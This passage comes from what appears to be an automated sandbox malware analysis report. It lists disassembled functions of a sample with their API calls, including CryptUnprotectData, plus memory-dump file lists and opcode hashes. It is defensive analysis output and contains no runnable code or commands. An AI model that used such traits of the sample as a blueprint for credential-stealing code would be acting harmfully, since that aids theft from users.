                                      • wsprintfA.USER32 ref: 00AD7C47
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 3317088062-0
                                      • Opcode ID: 830b865c52a905ae1a01054215b77c0aa4dcf390805807651cb3406829f20a29
                                      • Instruction ID: 26d085bd1e7db2a23cd5ade7bd060e10e5d35f4eea40b9fdcf0c09f4bbf97a4a
                                      • Opcode Fuzzy Hash: 830b865c52a905ae1a01054215b77c0aa4dcf390805807651cb3406829f20a29
                                      • Instruction Fuzzy Hash: 3011CEB0A19218EFEB208B54DC49FA9B778FB00710F0003D6F60A933C0DB741A408B50
                                      Function 00F09D84 Relevance: 5.4, Strings: 3, Instructions: 1625COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: !{n%$-3\$=aBB
                                      • API String ID: 0-1150782849
                                      • Opcode ID: 7622d34a7aa96e6c9cfd3af88f5d53d3edcd4c463f2dd344080de1d42f2d2828
                                      • Instruction ID: 86f8002dd519cba0688fa4106bbc324ce4a7229fccfbe1fb57f077895442da41
                                      • Opcode Fuzzy Hash: 7622d34a7aa96e6c9cfd3af88f5d53d3edcd4c463f2dd344080de1d42f2d2828
                                      • Instruction Fuzzy Hash: A6B207F3A08204AFE3046E29EC8567AFBE5EF94720F16893DE6C4C7744E63598058797
                                      Function 00AD3970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoCreateInstance.COMBASE(00ADE120,00000000,00000001,00ADE110,00000000), ref: 00AD39A8
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00AD3A00
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID:
                                      • API String ID: 123533781-0
                                      • Opcode ID: 09360ad059e8396faf648107631686fa0713719f97f59a159c366af23b06a673
                                      • Instruction ID: a929a3aad6a51c1316adf1b57b1f10f05182a3b5d0540409108d01c8cb22130d
                                      • Opcode Fuzzy Hash: 09360ad059e8396faf648107631686fa0713719f97f59a159c366af23b06a673
                                      • Instruction Fuzzy Hash: 1F411971A00A18AFDB24DB54CC95F9BB7B4BB48702F4041D9E609EB2E0D7726E85CF50
                                      Function 00ACA2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00ACA2D4
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00ACA2F3
                                      • LocalFree.KERNEL32(?), ref: 00ACA323
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                      • String ID:
                                      • API String ID: 2068576380-0
                                      • Opcode ID: cf3df5ffc97853594e7c87b707f8a86185e127a42d987f158cf6178660b48570
                                      • Instruction ID: afc2b8a960770c89bead0ab092f410a4cd6a0be601f46bd9817766ac23778a56
                                      • Opcode Fuzzy Hash: cf3df5ffc97853594e7c87b707f8a86185e127a42d987f158cf6178660b48570
                                      • Instruction Fuzzy Hash: D711A8B8A01209DFCB04DFA4D985AAEB7B5FB89300F108559ED15A7350D730AE50CB61
                                      Function 00F13F7E Relevance: 4.2, Strings: 2, Instructions: 1663COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: &io$27S
                                      • API String ID: 0-1351774588
                                      • Opcode ID: f35744b1762c10810cce3ae6dbb57155f29746b2a710a814dcf266b935b23ced
                                      • Instruction ID: c5cda0e3902875509d879dbec37d36a9f3a28e503ac9ceb08fd4fe35fbabd294
                                      • Opcode Fuzzy Hash: f35744b1762c10810cce3ae6dbb57155f29746b2a710a814dcf266b935b23ced
                                      • Instruction Fuzzy Hash: E0B204F3A0C6049FE304AE29DC8567AFBE9EF94720F16493DE6C4C3740EA3558458A97
                                      Function 00B34BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ?$__ZN
                                      • API String ID: 0-1427190319
                                      • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction ID: 97e0b654ae89a60721e48161cafd849084aa448bc8104bac4196268995432b5e
                                      • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction Fuzzy Hash: BA7214B2908B509BD728CF14C89076AB7E2FFD5310F698A9DF8E55B291D370EC419B81
                                      Function 00E29BED Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: [>/$z=D4
                                      • API String ID: 0-2343098861
                                      • Opcode ID: 6c41cb32a3b03ccd8a55bc727db445ca05ba6964c8dca05004677f7878848a2a
                                      • Instruction ID: 6eb49fc2df3b599c220861324e958ff95648ac55c8fb391acb48eb18b6a1ea18
                                      • Opcode Fuzzy Hash: 6c41cb32a3b03ccd8a55bc727db445ca05ba6964c8dca05004677f7878848a2a
                                      • Instruction Fuzzy Hash: 5C51F7F3A093045FE340796DDC4877AB7DADBD4720F2A853DE78483744E93948058296
                                      Function 00B15DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: xn--
                                      • API String ID: 0-2826155999
                                      • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                      • Instruction ID: a2497de2492fa0f9f4c33f3b5767162cab8b84c44c9a203ca44fbd9fa45962f5
                                      • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                      • Instruction Fuzzy Hash: 0CA204B2D042688AEF29CB68C8943EDBBF1EF45300F9842EAD4567B281D7755EC5CB50
                                      Function 00B14DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
                                      • API String ID: 3732870572-0
                                      • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                      • Instruction ID: 9cf6a21ac98ac2b317980d4afe269d678c32055080745186549f76829e0017bf
                                      • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                      • Instruction Fuzzy Hash: D3E1BE316083419FC725CE28C891BEEB7E2EFC9300F95496DE5D99B291D731A895CB82
                                      Function 00B14868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
                                      • API String ID: 3732870572-0
                                      • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                      • Instruction ID: 63b498db9c57700308b6fbde4e57da01cf744c8bf0eca40404bac37d41da4c2f
                                      • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                      • Instruction Fuzzy Hash: 9CE1B231A083059FCB24CE18C8917EFB7E6EFC5310F95896DE9999B251DB30AC85CB46
                                      Function 00B2E258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: UNC\
                                      • API String ID: 0-505053535
                                      • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                      • Instruction ID: c6c681cf2ee6b388beb6113dae93b9ae54063e7630b2bab76bc467838db938a3
                                      • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                      • Instruction Fuzzy Hash: A2E11771D042758EEB11CF1AD8843BEBBE2EB96314F1981E9C47C6B292C735CD468B90
                                      Function 00E7597A Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
